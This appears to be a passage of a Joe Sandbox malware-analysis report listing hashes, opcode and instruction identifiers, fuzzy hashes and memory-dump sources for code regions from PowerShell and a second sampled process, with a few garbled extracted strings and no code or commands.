                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 235fc575a4a92bbf11371bb52a7828ec0912dd5a98bd1334bd99d8bcdd81677f
                                                                                                      • Instruction ID: 21c4bc3512bb7603aaff0d5dc240797053a4c01b7f764ee2875929079f32e14a
                                                                                                      • Opcode Fuzzy Hash: 235fc575a4a92bbf11371bb52a7828ec0912dd5a98bd1334bd99d8bcdd81677f
                                                                                                      • Instruction Fuzzy Hash: E9D05E36B42021172A5839B91E04ABB64DB8BC50DAF0B017A9F0AE3760ED50EC2743E0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 154d14b817027b99be1e7c1471c17c1e1e87186ab0a8acc7c0ded0c0a8f49903
                                                                                                      • Instruction ID: 79c39c248754e8092cf3e15576c1cb826993603d11c3e55812f9998482b39f27
                                                                                                      • Opcode Fuzzy Hash: 154d14b817027b99be1e7c1471c17c1e1e87186ab0a8acc7c0ded0c0a8f49903
                                                                                                      • Instruction Fuzzy Hash: D9E0C2317816145B9711A62EA91485FBBEADFC8671351802EE62EC7350EEA0EC0647D5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                      • Instruction ID: 9d432d5cfcd1ddfc914862614ee32fc51e79531f967574572f2f7cdf6043439d
                                                                                                      • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                      • Instruction Fuzzy Hash: 65E08632B00014978B089599D4504D9F7A5DBCD220F04C47EDE0AA7350DA3269168691
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e09d707ce0cd9c06cc24723be99d29cbfb9c961b4c3d4f9096611db906ceb2cc
                                                                                                      • Instruction ID: 4c49de296ea262925ab959a82bd218a5cabac89c1fe3e66bd559c1cdab6c2318
                                                                                                      • Opcode Fuzzy Hash: e09d707ce0cd9c06cc24723be99d29cbfb9c961b4c3d4f9096611db906ceb2cc
                                                                                                      • Instruction Fuzzy Hash: 2FE0C236B042561BCB0DE42EA820626BBDF8BC6215B0A80BAE608CB251DD219C1382E0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 0b50db9a919dcd4f2a0573634a807f97fbcfe6bece457293c3bf92379510e1af
                                                                                                      • Instruction ID: da7c1f420645b26450f8ad1f780925860214627753b042d2c37520a94b7d0746
                                                                                                      • Opcode Fuzzy Hash: 0b50db9a919dcd4f2a0573634a807f97fbcfe6bece457293c3bf92379510e1af
                                                                                                      • Instruction Fuzzy Hash: E5E01231804109DBCB0DFFA4D87B4BDBFB8FB00311F01125DD95A572A1DA302556CA95
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a43f936e6e71e46ba4d6a523bf591f5e363cac6fd90f570061515c554a448381
                                                                                                      • Instruction ID: 39f7810f2d2a6d570e14e3d036085aee7a8d910d5d35d9d48b7eb208f4047dff
                                                                                                      • Opcode Fuzzy Hash: a43f936e6e71e46ba4d6a523bf591f5e363cac6fd90f570061515c554a448381
                                                                                                      • Instruction Fuzzy Hash: 65E08635A08209DFCB08EFA8D5A686ABFF8EB45204F014169DE4D9B3A1E7306D51CFC1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                      • Instruction ID: 772dffecc95feebac6edbd31e1afa1f33c0ec8af616b0b83ea249713dee942ba
                                                                                                      • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                      • Instruction Fuzzy Hash: 4FD06271D042099F8780EFADC94156DFBF4EB48200F5085AA8919E7311F7315612DBD1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e60cf25f112d7c5de6257ce4b874f805735a3f688982bb09fba3386df26b78e5
                                                                                                      • Instruction ID: 028c8be11f197b34fc6a3f4012b9a58daf8198d1294c930681e148f37da8d210
                                                                                                      • Opcode Fuzzy Hash: e60cf25f112d7c5de6257ce4b874f805735a3f688982bb09fba3386df26b78e5
                                                                                                      • Instruction Fuzzy Hash: D4D01731804109DBCB08ABA4E83B4BDBB74FB04301F41026DDE1F92291EA302A5ACAC0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 4aed4100ac08166b7dd82fe2039c6fe848551f2e5f5563a0b430b761d5b7a46c
                                                                                                      • Instruction ID: 0349204da4242671b3aa5c9eaecb97edb041a27c75d3053f567e37ffda2e54d6
                                                                                                      • Opcode Fuzzy Hash: 4aed4100ac08166b7dd82fe2039c6fe848551f2e5f5563a0b430b761d5b7a46c
                                                                                                      • Instruction Fuzzy Hash: 42D01734A0820ADB8B08EFA4E45686EBBB5EB48200F004269DE4D93350EA306952CBC1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 930ebfb6320835cc9e70d15b1064d2972729feae59243374db8b8a84cb0b0ad1
                                                                                                      • Instruction ID: fdd4fef342164e305c0ba04e49ff35c3b47aeff0b4185254f2c2290359c86ada
                                                                                                      • Opcode Fuzzy Hash: 930ebfb6320835cc9e70d15b1064d2972729feae59243374db8b8a84cb0b0ad1
                                                                                                      • Instruction Fuzzy Hash: 9AD02331004E4587C3087B659C994103745B74131570118DCEF0DDF1B7D616B086DB74
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: bac481d64730ad8c5160236ac48b791822095ef291bc78aff539972f943a9cb3
                                                                                                      • Instruction ID: 08b7b1eac69b3bcd366faef0d7c0c62e076d0d6f0ad068ebb61d942ac0e65eec
                                                                                                      • Opcode Fuzzy Hash: bac481d64730ad8c5160236ac48b791822095ef291bc78aff539972f943a9cb3
                                                                                                      • Instruction Fuzzy Hash: BEC04C229193D00FEF0693711CAA1056FB14753615B0A4AC69E41DB176D8359C16E251
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 83ef59219e92e03ecf34b85e758d00f9f450debe0254077f8e66877ec6a4fa6d
                                                                                                      • Instruction ID: c5dcf16e86b30557c8904dca4ea590ce31b1ddbb4f038e1748e904bf1b66805a
                                                                                                      • Opcode Fuzzy Hash: 83ef59219e92e03ecf34b85e758d00f9f450debe0254077f8e66877ec6a4fa6d
                                                                                                      • Instruction Fuzzy Hash: C4B09231044B09CFC249AF75E4088147329BB4021938108ACE91E0B296CE36E889CA89
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b485e0d961e9e1d3f37b68436e09d1a64108e0df35d0f29e8300afcc2a67dbfa
                                                                                                      • Instruction ID: c0e3fb11f656540a549637a6e289328aa4a7c6ac420d0f49d4adcf671a83b6f0
                                                                                                      • Opcode Fuzzy Hash: b485e0d961e9e1d3f37b68436e09d1a64108e0df35d0f29e8300afcc2a67dbfa
                                                                                                      • Instruction Fuzzy Hash: B8A00237B1465147BF4FEA35565A53A7AA357C3201704C4AE5707C0155DD35B842A514
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1718058242.0000000007900000.00000040.00000800.00020000.00000000.sdmp, Offset: 07900000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7900000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: $c<k$4'^q$4'^q$84Gl$84Gl$tP^q$tP^q$JJl$JJl$JJl$JJl$JJl
                                                                                                      • API String ID: 0-2639585402
                                                                                                      • Opcode ID: 8bb9f132dc11d51c87f430785c1da02da4567fc4ad0f3181ddbec8722d25b9ed
                                                                                                      • Instruction ID: 1a6c3754bd0dbc82b12c9c42fad0ee71db6e7a28f9acad6cfec616770bb8d450
                                                                                                      • Opcode Fuzzy Hash: 8bb9f132dc11d51c87f430785c1da02da4567fc4ad0f3181ddbec8722d25b9ed
                                                                                                      • Instruction Fuzzy Hash: 91913AB1B5434A8FC7258B689405A6FFBBAFFC6318F1884ABD5058B295DB31C845C3E1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1718058242.0000000007900000.00000040.00000800.00020000.00000000.sdmp, Offset: 07900000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7900000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q$?l$?l
                                                                                                      • API String ID: 0-327507277
                                                                                                      • Opcode ID: 35abeb90f4fa1f1eb1bc7f8ee7a0ddf33a85dbf8c3e0c71872721c99b943fa1c
                                                                                                      • Instruction ID: ff3b5b4718a4e8c8e56a508a1ac4a26a3da895451f4f7ad8eb2f40fe14f18868
                                                                                                      • Opcode Fuzzy Hash: 35abeb90f4fa1f1eb1bc7f8ee7a0ddf33a85dbf8c3e0c71872721c99b943fa1c
                                                                                                      • Instruction Fuzzy Hash: 06B147B17243559FC7248A699804B76BFAAAFC6318F1484AFD409CF3E2DA31C845C7E1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1718058242.0000000007900000.00000040.00000800.00020000.00000000.sdmp, Offset: 07900000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7900000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: fcq$84Gl$`Q^q$`Q^q$tP^q$$^q$$^q$$^q$$^q$$^q
                                                                                                      • API String ID: 0-771344138
                                                                                                      • Opcode ID: b5be4c322620aa9e7b733242cbae5d815e25fcbd33dc9fbf5aca7453c980a2d3
                                                                                                      • Instruction ID: 440f282478423179521e2c4920f86ee47e7cac4b3d2d9c71f65059e581f40fbe
                                                                                                      • Opcode Fuzzy Hash: b5be4c322620aa9e7b733242cbae5d815e25fcbd33dc9fbf5aca7453c980a2d3
                                                                                                      • Instruction Fuzzy Hash: C171ADB0AA420EDFDB28CE58C544BAEB7FABB45359F148455E8009B2D5C771DC84CBE1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1718058242.0000000007900000.00000040.00000800.00020000.00000000.sdmp, Offset: 07900000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7900000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 4'^q$4'^q$$^q$$^q$$^q$?l$?l
                                                                                                      • API String ID: 0-3395204514
                                                                                                      • Opcode ID: 871dd436b4f33d550d3e1b0bcb5b7da15800900e083b628452cb07153c0e446f
                                                                                                      • Instruction ID: f9d635857ad08e29361487792cef9c392c953ca63fb115bb03c5c0f19467b5e7
                                                                                                      • Opcode Fuzzy Hash: 871dd436b4f33d550d3e1b0bcb5b7da15800900e083b628452cb07153c0e446f
                                                                                                      • Instruction Fuzzy Hash: 725149F5B243069FCB244A298814A66BFBAAFC3614F2484BFD405CB7D1DA31C885C7E1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1718058242.0000000007900000.00000040.00000800.00020000.00000000.sdmp, Offset: 07900000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7900000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: $c<k$$^q$$^q$JJl$JJl$JJl
                                                                                                      • API String ID: 0-1194022432
                                                                                                      • Opcode ID: 4e119956c5b218f85da7d300115cea49a8c2eb64ebddb4361c243083d13543bb
                                                                                                      • Instruction ID: 3303bbde42efdeed50c889e4f03c1fe18bc52287d8cba1f495adf79bf11e5280
                                                                                                      • Opcode Fuzzy Hash: 4e119956c5b218f85da7d300115cea49a8c2eb64ebddb4361c243083d13543bb
                                                                                                      • Instruction Fuzzy Hash: F2115CF17293528FC336835C4C09A67BBB97FD2654F1449A7C9409F2AAC6758C85C3E2
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1718058242.0000000007900000.00000040.00000800.00020000.00000000.sdmp, Offset: 07900000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7900000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Tc<k$lc<k$JJl$JJl$JJl$JJl
                                                                                                      • API String ID: 0-3030476618
                                                                                                      • Opcode ID: dfc998cfc9c1b53be4f1c6716cf878974359fb42b98a2a0dca34987e8fa57018
                                                                                                      • Instruction ID: ca8cb18de45b8d023cc54f65643a51d0062b8efce91d4be71eb7a1a43c7a5b72
                                                                                                      • Opcode Fuzzy Hash: dfc998cfc9c1b53be4f1c6716cf878974359fb42b98a2a0dca34987e8fa57018
                                                                                                      • Instruction Fuzzy Hash: 1C1166B1A1C3918FC715C7A84C16E67BF687BE2304B1544ABC1008F6E5C9308D46C3E3
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: tMIl$`_q$`_q$`_q$`_q
                                                                                                      • API String ID: 0-3706764884
                                                                                                      • Opcode ID: 6eaf12a33d2579e7459f37117879379a40fb2bc1650253b725b4e4bcaa7f87cb
                                                                                                      • Instruction ID: 99b418379dc41d3df9bb901226d06928dbb461f732c0776403eec9594ce9d270
                                                                                                      • Opcode Fuzzy Hash: 6eaf12a33d2579e7459f37117879379a40fb2bc1650253b725b4e4bcaa7f87cb
                                                                                                      • Instruction Fuzzy Hash: D7B1C974E002099FDB55DFA9D980A9EFBF2FF48304F108629D919AB315DB30A945CF90
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: tMIl$`_q$`_q$`_q$`_q
                                                                                                      • API String ID: 0-3706764884
                                                                                                      • Opcode ID: 58aa3c0e75130197208b33fc800490e9becb87d21b912a824ed90bfca5a592e3
                                                                                                      • Instruction ID: 030ff5eae43694490ac4ba8e94d843ac2a7f57a959df8d15f7cb8576f98a8f69
                                                                                                      • Opcode Fuzzy Hash: 58aa3c0e75130197208b33fc800490e9becb87d21b912a824ed90bfca5a592e3
                                                                                                      • Instruction Fuzzy Hash: 82B19874E012099FDB54DFA9D590A9EFBF2FF48304F108629D919AB314EB70A945CF90
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1824290707.00007FFD9B9A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7ffd9b9a0000_vkefq4cv.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d0e6bfbbb2e331932102d212d8a59c4d2045335c4cd5e7b35df1189514d7d127
                                                                                                      • Instruction ID: accef07474c9168772c8e075f28b617bf93028f78bbeb1a79b8a1ebb22363f86
                                                                                                      • Opcode Fuzzy Hash: d0e6bfbbb2e331932102d212d8a59c4d2045335c4cd5e7b35df1189514d7d127
                                                                                                      • Instruction Fuzzy Hash: 8931B270D1A25A9FC7A9DBB488657F9BBE0EF45310F0105BDD00AAB3E1DA781945CB11
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1824290707.00007FFD9B9A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7ffd9b9a0000_vkefq4cv.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d73d43fa83b306d6358e824926678154d1851c4a6a50ff764b0e0fd0a6a12f4b
                                                                                                      • Instruction ID: 74819076c7a194e5209ed282c16d8c9261903f240252ba027ce377bd82b51723
                                                                                                      • Opcode Fuzzy Hash: d73d43fa83b306d6358e824926678154d1851c4a6a50ff764b0e0fd0a6a12f4b
                                                                                                      • Instruction Fuzzy Hash: 80212271A2A64D9FEB559FA488613ECBFE0FF45320F02007EC4499B192CA695989CB11
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1824290707.00007FFD9B9A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7ffd9b9a0000_vkefq4cv.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: de7eb006aa9c1390bd2ac297c7cd1e1d9829658b93d5276640b520e59356c0bb
                                                                                                      • Instruction ID: a907a15ce43d2d0e309df2bf0af10617e32dc8b6c3cc3535eaced7a8c396e409
                                                                                                      • Opcode Fuzzy Hash: de7eb006aa9c1390bd2ac297c7cd1e1d9829658b93d5276640b520e59356c0bb
                                                                                                      • Instruction Fuzzy Hash: 8321CF3194E68D9FD7069BB494256E9BFF0EF42310F0140BAE04AD31A3CA6D5649C752
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1824290707.00007FFD9B9A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7ffd9b9a0000_vkefq4cv.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d9a1b42c4f1f0f6ad03d5cedaa4d6b36eb63ca6bdeb943661a22215425352a48
                                                                                                      • Instruction ID: e5d9f4e9ef2b20c7b267554c0deed1fe87b91df32ac30ee6fb471b29d75e6492
                                                                                                      • Opcode Fuzzy Hash: d9a1b42c4f1f0f6ad03d5cedaa4d6b36eb63ca6bdeb943661a22215425352a48
                                                                                                      • Instruction Fuzzy Hash: F621D86166EB866FC3469BB8442A1E9BFE0EF4623071744FDC045CB2B6DA9C0C07C711
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1824290707.00007FFD9B9A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7ffd9b9a0000_vkefq4cv.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 7c3d418ec049ab2c5d40f35759e59a1e7c3e2955896f97f70e5fe72b59f13b28
                                                                                                      • Instruction ID: 695931f2bc4f047c829752b003beb407b58d464a56fc284fab8b33eec4178bff
                                                                                                      • Opcode Fuzzy Hash: 7c3d418ec049ab2c5d40f35759e59a1e7c3e2955896f97f70e5fe72b59f13b28
                                                                                                      • Instruction Fuzzy Hash: 85113231A4E68C8FD7129BA0A8216E9BFB0EF82320F0241BBD049D71A3CA6C5518C752
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1824290707.00007FFD9B9A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7ffd9b9a0000_vkefq4cv.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 3b25d3bf0ddb2140e2d0c637f0e8e89d45c1fc243be8155e61079615ce94062a
                                                                                                      • Instruction ID: a52e0a4d1db18b060218aaeb94231b05f9b88dcb38d41044561734a6897e6494
                                                                                                      • Opcode Fuzzy Hash: 3b25d3bf0ddb2140e2d0c637f0e8e89d45c1fc243be8155e61079615ce94062a
                                                                                                      • Instruction Fuzzy Hash: 7F112971E1992D9FDBA8EF98C8A56ACB7B2FF5A340F110169D00DD72A2CE346941CB40
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1824290707.00007FFD9B9A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7ffd9b9a0000_vkefq4cv.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 516fa0fcf563e7502b36ef048a77f769a315f4307c6a5fa9cfde37c4e665117e
                                                                                                      • Instruction ID: 848d1a153d7bc92473c8bf97e9373e5d115ff623f131e1092214b1f9bbddc138
                                                                                                      • Opcode Fuzzy Hash: 516fa0fcf563e7502b36ef048a77f769a315f4307c6a5fa9cfde37c4e665117e
                                                                                                      • Instruction Fuzzy Hash: 1711B661169BC66FC7429BB854261EABFE0AF8623071781FDC0858B26AC69C0C47C721
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1824290707.00007FFD9B9A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7ffd9b9a0000_vkefq4cv.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c0c4eb1f9427d98a312bc2194077f69165b9a5f07f5b9b7c1a86ce904bac9962
                                                                                                      • Instruction ID: 772ac662fc061a88d4e3143e9f68a1dac6c4e92d2aa22e32d88ace913fbd7700
                                                                                                      • Opcode Fuzzy Hash: c0c4eb1f9427d98a312bc2194077f69165b9a5f07f5b9b7c1a86ce904bac9962
                                                                                                      • Instruction Fuzzy Hash: 4E11C13155E7CD4FD752AB708D252E63BA0EF06310F4605BAD408C61E2DA6CA608C752
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1824290707.00007FFD9B9A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7ffd9b9a0000_vkefq4cv.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
